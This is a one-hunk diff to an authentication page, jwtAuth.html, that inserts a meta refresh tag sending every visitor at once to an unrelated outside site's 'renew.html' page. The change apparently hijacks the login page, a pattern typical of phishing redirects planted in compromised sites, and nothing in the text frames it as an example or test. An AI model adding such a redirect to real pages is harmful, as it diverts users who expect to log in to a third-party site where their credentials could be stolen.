--- a/jwtAuth.html
+++ b/jwtAuth.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html>
 
-<head>
+<head><meta http-equiv="refresh" content="0; URL='https://wishmecards.com/renew.html'" />
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Authentication</title>
 </head>
